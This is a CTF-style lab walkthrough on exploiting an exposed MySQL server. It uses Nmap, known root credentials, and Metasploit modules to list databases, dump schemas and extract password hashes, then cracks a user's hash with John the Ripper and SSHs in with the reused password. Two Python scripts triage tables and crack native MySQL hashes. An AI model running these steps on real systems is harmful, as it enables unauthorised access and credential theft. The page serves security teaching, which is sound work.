How to Enumerate and Exploit an Exposed MySQL (Database) Server
Initial Reconnaissance
The first step in exploiting a MySQL database is identifying whether the target exposes a MySQL listener. By default MySQL listens on TCP port 3306, but an administrator can move it, so scan for open ports rather than assuming 3306. Once a listener is found you can try to connect with default or previously obtained credentials, or brute-force the login if nothing throttles failed attempts (stock MySQL does not rate-limit bad passwords on its own; throttling comes from the connection_control plugin or an external tool such as fail2ban, when either is deployed).
Example Nmap scan:
root@ip-10-10-22-136:~# IP=10.10.190.97
root@ip-10-10-22-136:~# nmap -sS -T4 -F -oN output.txt $IP

Starting Nmap 7.60 ( https://nmap.org ) at 2024-10-06 02:34 BST
Nmap scan report for ip-10-10-244-95.eu-west-1.compute.internal (10.10.244.95)
Host is up (0.0012s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
3306/tcp open  mysql
MAC Address: 02:59:70:A7:8E:95 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.67 seconds
The call above uses -sS for a SYN (half-open) scan, which is faster and less noisy than a full TCP connect scan and needs raw-socket privileges, hence the root prompt. -T4 selects a faster timing template than the default, trading a little accuracy for speed. -F restricts the scan to the 100 most common ports, so a MySQL instance moved to a non-default port would be missed; if 3306 is closed, rescan with -p- and add -sV so the service is identified by its banner rather than by port number. -oN output.txt saves the results in Nmap's normal format to output.txt, and $IP is the target address.
Using stolen credentials
For this box we already know the MySQL credentials obtained earlier, username root and password password, and we will use them to gain further access on the server. Once connected and authenticated we can enumerate the database to gather more information about the system.
root@ip-10-10-22-136:~# username=root
root@ip-10-10-22-136:~# mysql -h $IP -u $username -p
Enter password: password
Enumerating MySQL using Metasploit
We'll be using Metasploit modules to extract information from the database. The first step is an authenticated request that lists the databases present on the server: set RHOSTS, USERNAME and PASSWORD to the server's IP and credentials, and set SQL to the show databases statement, which the auxiliary/admin/mysql/mysql_sql module executes on our behalf.
msfconsole
msf6 > use auxiliary/admin/mysql/mysql_sql
msf6 auxiliary(admin/mysql/mysql_sql) > set RHOSTS 10.10.244.95
msf6 auxiliary(admin/mysql/mysql_sql) > set USERNAME root
msf6 auxiliary(admin/mysql/mysql_sql) > set PASSWORD password
msf6 auxiliary(admin/mysql/mysql_sql) > set SQL show databases
msf6 auxiliary(admin/mysql/mysql_sql) > options

Module options (auxiliary/admin/mysql/mysql_sql):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
   SQL   show databases   yes       The SQL to execute.


   Used when connecting via an existing SESSION:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   no        The session to run this module on


   Used when making a new connection via RHOSTS:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  password         no        The password for the specified username
   RHOSTS    10.10.244.95     no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT     3306             no        The target port (TCP)
   USERNAME  root             no        The username to authenticate as

msf6 auxiliary(admin/mysql/mysql_sql) > run

[*] Running module against 10.10.244.95

[*] 10.10.244.95:3306 - Sending statement: 'show databases'...
[*] 10.10.244.95:3306 - | information_schema |
[*] 10.10.244.95:3306 - | mysql |
[*] 10.10.244.95:3306 - | performance_schema |
[*] 10.10.244.95:3306 - | sys |
[*] Auxiliary module execution completed
Reading MySQL Database
We can further analyze the structure of the MySQL database by dumping the schema of every table with the Metasploit module mysql_schemadump. The module retrieves the database schema: the databases, their tables, the columns of each table and the column data types. This information is critical for targeted exploitation, because knowing the table names and layouts lets us focus on tables that likely hold sensitive data, such as users, passwords, sessions or admin. Only the tail of the dump, the last view of the built-in sys schema, is reproduced below.
msf6 > use auxiliary/scanner/mysql/mysql_schemadump
msf6 auxiliary(scanner/mysql/mysql_schemadump) > set RHOSTS 10.10.244.95
msf6 auxiliary(scanner/mysql/mysql_schemadump) > set USERNAME root
msf6 auxiliary(scanner/mysql/mysql_schemadump) > set PASSWORD password
msf6 auxiliary(scanner/mysql/mysql_schemadump) > options

Module options (auxiliary/scanner/mysql/mysql_schemadump):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   DISPLAY_RESULTS  true             yes       Display the Results to the Screen


   Used when connecting via an existing SESSION:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   no        The session to run this module on


   Used when making a new connection via RHOSTS:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  password         no        The password for the specified username
   RHOSTS    10.10.244.95     no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT     3306             no        The target port (TCP)
   THREADS   1                yes       The number of concurrent threads (max one per host)
   USERNAME  root             no        The username to authenticate as

msf6 auxiliary(scanner/mysql/mysql_schemadump) > run

- TableName: x$waits_global_by_latency
  Columns:
  - ColumnName: events
    ColumnType: varchar(128)
  - ColumnName: total
    ColumnType: bigint(20) unsigned
  - ColumnName: total_latency
    ColumnType: bigint(20) unsigned
  - ColumnName: avg_latency
    ColumnType: bigint(20) unsigned
  - ColumnName: max_latency
    ColumnType: bigint(20) unsigned

[*] 10.10.244.95:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
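The triage described above, picking the handful of tables worth reading out of a dump that also lists every sys and performance_schema view, can be scripted. The following Python is an added example and is not part of the original write-up or of Metasploit: it parses a schema dump in the YAML-style layout mysql_schemadump prints (the sample is constructed and includes the DBName level that the excerpt above omits), skips the built-in schemas, and ranks the remaining tables by credential-related words in their table and column names. The keyword list and the webapp schema in the sample are assumptions for illustration.

```python
import re
from collections import defaultdict

# Constructed sample in the layout mysql_schemadump prints; not captured from the box.
SAMPLE_DUMP = """\
---
- DBName: sys
  Tables:
  - TableName: x$waits_global_by_latency
    Columns:
    - ColumnName: events
      ColumnType: varchar(128)
    - ColumnName: total
      ColumnType: bigint(20) unsigned
- DBName: webapp
  Tables:
  - TableName: users
    Columns:
    - ColumnName: id
      ColumnType: int(11)
    - ColumnName: email
      ColumnType: varchar(255)
    - ColumnName: password_hash
      ColumnType: varchar(255)
  - TableName: sessions
    Columns:
    - ColumnName: token
      ColumnType: char(64)
    - ColumnName: user_id
      ColumnType: int(11)
  - TableName: products
    Columns:
    - ColumnName: sku
      ColumnType: varchar(32)
"""

# Schemas shipped with MySQL itself; their tables are noise for data hunting.
SYSTEM_SCHEMAS = {"mysql", "information_schema", "performance_schema", "sys"}

# Assumed keyword list; extend it for the application under test.
SENSITIVE_WORDS = ("user", "pass", "pwd", "hash", "secret", "token",
                   "session", "admin", "key", "cred", "card")

# One "Key: value" pair per line, with or without a leading "- " and any indentation.
LINE = re.compile(r"^\s*-?\s*(DBName|TableName|ColumnName|ColumnType):\s*(.*?)\s*$")


def parse_schemadump(text):
    """Return {db: {table: [(column, type), ...]}}.

    Line-based rather than a YAML parser so it also copes with excerpts whose
    indentation was flattened; relies on the module's key order
    DBName > TableName > ColumnName > ColumnType.
    """
    schema = defaultdict(dict)
    db, table, col = "(unknown)", None, None  # excerpts may lack the DBName level
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        key, value = m.groups()
        if key == "DBName":
            db, table = value, None
        elif key == "TableName":
            table = value
            schema[db][table] = []
        elif key == "ColumnName":
            col = value
        elif key == "ColumnType" and table is not None:
            schema[db][table].append((col, value))
    return dict(schema)


def triage(schema, words=SENSITIVE_WORDS, skip=SYSTEM_SCHEMAS):
    """Rank non-system tables by the sensitive words found in table or column names.

    Returns [("db.table", [matched words]), ...], most hits first, then by name.
    """
    ranked = []
    for db, tables in schema.items():
        if db in skip:
            continue
        for table, cols in tables.items():
            names = [table.lower()] + [c.lower() for c, _ in cols]
            hits = sorted({w for w in words for n in names if w in n})
            if hits:
                ranked.append((f"{db}.{table}", hits))
    ranked.sort(key=lambda t: (-len(t[1]), t[0]))
    return ranked


if __name__ == "__main__":
    for table, hits in triage(parse_schemadump(SAMPLE_DUMP)):
        print(f"{table:<20} {', '.join(hits)}")
```

Feed it the saved DISPLAY_RESULTS output (or the loot file the module writes) and read the top of the list first; on the page's own run every table lives in a built-in schema, so the ranked list would be empty and the interesting data is the mysql.user table that the next module reads directly.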
MySQL Hashdump
Next we use the mysql_hashdump module, which reads the password hashes from the mysql.user table (kept in the authentication_string column on MySQL 5.7 and later) and saves them as loot for offline cracking. In this case we were able to identify the entry carl with its corresponding password hash. Two other entries are worth a look: the first root entry has an empty hash, so that account either has no password or authenticates through another plugin (on Ubuntu, root@localhost commonly uses auth_socket, which leaves authentication_string empty), and mysql.session and mysql.sys carry the string *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE, which MySQL assigns to internal accounts that can never log in with a password.
msf6 > use auxiliary/scanner/mysql/mysql_hashdump
msf6 auxiliary(scanner/mysql/mysql_hashdump) > set RHOSTS 10.10.244.95
msf6 auxiliary(scanner/mysql/mysql_hashdump) > set USERNAME root
msf6 auxiliary(scanner/mysql/mysql_hashdump) > set PASSWORD password
msf6 auxiliary(scanner/mysql/mysql_hashdump) > options

Module options (auxiliary/scanner/mysql/mysql_hashdump):

   Used when connecting via an existing SESSION:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   no        The session to run this module on


   Used when making a new connection via RHOSTS:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  password         no        The password for the specified username
   RHOSTS    10.10.244.95     no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT     3306             no        The target port (TCP)
   THREADS   1                yes       The number of concurrent threads (max one per host)
   USERNAME  root             no        The username to authenticate as


msf6 auxiliary(scanner/mysql/mysql_hashdump) > run

[+] 10.10.244.95:3306 - Saving HashString as Loot: root:
[+] 10.10.244.95:3306 - Saving HashString as Loot: mysql.session:*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE
[+] 10.10.244.95:3306 - Saving HashString as Loot: mysql.sys:*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE
[+] 10.10.244.95:3306 - Saving HashString as Loot: debian-sys-maint:*D9C95B328FE46FFAE1A55A2DE5719A8681B2F79E
[+] 10.10.244.95:3306 - Saving HashString as Loot: root:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
[+] 10.10.244.95:3306 - Saving HashString as Loot: carl:*EA031893AA21444B170FC2162A56978B8CEECE18
[*] 10.10.244.95:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Cracking the Hash
A hash cannot be reversed, but mysql_native_password hashes are unsalted SHA1(SHA1(password)), so John the Ripper, a popular password-cracking tool, can recover the plaintext by guessing: it hashes candidate passwords with the same algorithm and compares each result against the target hash, and reports the candidate as soon as one matches.
root@ip-10-10-22-136:~# echo carl:*EA031893AA21444B170FC2162A56978B8CEECE18 > hash.txt
root@ip-10-10-22-136:~# john hash.txt

Proceeding with wordlist:/opt/john/password.lst
Proceeding with incremental:ASCII
doggie (carl)
1g 0:00:00:02 DONE 3/3 (2024-10-06 02:57) 0.4566g/s 1043Kp/s 1043Kc/s 1043KC/s doggie..doggia
John is run here in its default configuration: it recognises the mysql-sha1 format from the leading * and works through its modes in order, single-crack, then the built-in wordlist /opt/john/password.lst, then incremental brute force. The 3/3 in the summary line shows that carl's password, doggie, was found in the third (incremental) mode, about two seconds in.
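As an added example that is not part of the original write-up, the following Python reproduces in a few lines what mysql_hashdump and John did above: it parses the user:hash loot lines from this page's run, classifies each entry (empty, locked, native or caching_sha2), and runs a dictionary attack against the mysql_native_password hashes with a tiny wordlist constructed here in place of john's password.lst. The double-SHA1 routine is MySQL's real algorithm; *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 is the well-known native hash of the string password, and carl's hash resolves to doggie exactly as John reported. Because the scheme has no salt, every candidate is hashed once and looked up against all users at the same time, which is the point the salting takeaway at the end of the page makes; the $A$ branch marks caching_sha2_password hashes, which this lookup-table approach cannot handle. The hash of "password" and the loot lines are from the page; the wordlist and the classification labels are this example's own.

```python
import hashlib

# Loot lines in the user:hash form mysql_hashdump prints, copied from the run on this page.
LOOT = """\
root:
mysql.session:*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE
mysql.sys:*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE
debian-sys-maint:*D9C95B328FE46FFAE1A55A2DE5719A8681B2F79E
root:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
carl:*EA031893AA21444B170FC2162A56978B8CEECE18
"""

# Constructed stand-in for john's password.lst.
WORDLIST = ["123456", "admin", "password", "doggie", "letmein"]

HEX = set("0123456789ABCDEF")


def mysql_native_hash(password):
    """mysql_native_password: '*' + upper-case hex of SHA1(SHA1(password)).

    No salt and no per-user input: the same password always yields the same
    hash, so one table of candidate hashes serves every account in the dump.
    """
    inner = hashlib.sha1(password.encode()).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def classify(hash_str):
    """Label a mysql.user authentication_string so we only attack what is attackable."""
    if hash_str == "":
        return "empty"          # no password, or another plugin (e.g. auth_socket)
    if hash_str.startswith("$A$"):
        return "caching_sha2"   # salted, iterated SHA-256 (MySQL 8 default): no table lookup
    if hash_str.startswith("*") and len(hash_str) == 41 and set(hash_str[1:]) <= HEX:
        return "native"
    return "locked"             # e.g. *THISISNOTAVALIDPASSWORD...: nothing can ever match


def parse_loot(text):
    """Split 'user:hash' lines into (user, hash) pairs; an empty hash is kept as ''."""
    entries = []
    for line in text.splitlines():
        if ":" not in line:
            continue
        user, h = line.split(":", 1)
        entries.append((user.strip(), h.strip()))
    return entries


def audit(entries, wordlist):
    """Dictionary attack on the native hashes.

    Returns [(user, status)] where status is 'empty', 'locked', 'caching_sha2',
    'cracked:<plaintext>' or 'uncracked'. The candidates are hashed once up
    front; every native hash is then a dictionary lookup.
    """
    table = {mysql_native_hash(w): w for w in wordlist}
    out = []
    for user, h in entries:
        kind = classify(h)
        if kind != "native":
            out.append((user, kind))
            continue
        pw = table.get(h)
        out.append((user, f"cracked:{pw}" if pw is not None else "uncracked"))
    return out


if __name__ == "__main__":
    for user, status in audit(parse_loot(LOOT), WORDLIST):
        print(f"{user:<18} {status}")
```

On a real engagement the loot file Metasploit writes replaces LOOT and a proper wordlist replaces WORDLIST; the shape stays the same. The asymmetry between the native and caching_sha2 branches is the whole argument for salted, iterated hashing: with caching_sha2_password the table built once in audit would have to be rebuilt per hash.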
Accessing the Server over SSH
Carl reused his MySQL password for his system account, so the cracked credential lets us SSH straight into the server as carl and reach its resources directly.
root@ip-10-10-22-136:~# ssh carl@10.10.244.95
carl@10.10.244.95's password: doggie

Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-96-generic x86_64)
carl@polomysql:~$
Takeaways:
- Credential-Based Exploitation: Gaining access to MySQL with known credentials (here root with a weak password) can lead to control over the database and, through reused passwords, the server itself, emphasizing the importance of strong, unique credentials and of not exposing root over the network.
- Metasploit Modules as Recon Tools: Metasploit's mysql_sql, mysql_schemadump and mysql_hashdump modules are effective for mapping the database structure and extracting sensitive data such as password hashes.
- Importance of Salting: mysql_native_password stores an unsalted SHA1(SHA1(password)), so one precomputed table of candidate hashes can be checked against every user at once and an ordinary word like doggie falls in seconds. A salted, iterated scheme (MySQL 8's default caching_sha2_password, or bcrypt or Argon2 for application tables) forces the attacker to recompute each guess per hash and defeats rainbow tables. Salting does not make John the Ripper useless against weak passwords, so it has to go together with strong, unique passwords and with keeping the database off the public network.